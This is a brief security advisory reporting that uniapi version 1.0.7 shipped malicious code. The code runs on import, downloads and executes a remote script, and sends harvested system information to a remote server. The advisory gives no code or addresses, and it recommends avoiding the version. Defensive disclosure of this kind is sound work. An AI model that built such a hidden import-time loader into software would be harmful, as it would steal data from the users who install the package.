Name of the Vulnerable Software and Affected Versions: uniapi version 1.0.7

Description: The issue concerns code introduced in a specific version of the software that executes upon import of the module. This code downloads a script from a remote URL and then executes the downloaded script in a thread. The script harvests system information and sends it to another remote URL using the POST method. This malicious code was found in the release artifacts but was not present in the public repository.

Recommendations: For uniapi version 1.0.7, consider removing or avoiding the use of this version due to the presence of malicious code. As a temporary workaround, consider disabling the execution of scripts downloaded from remote URLs until a safe version is available. Avoid using the affected module until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.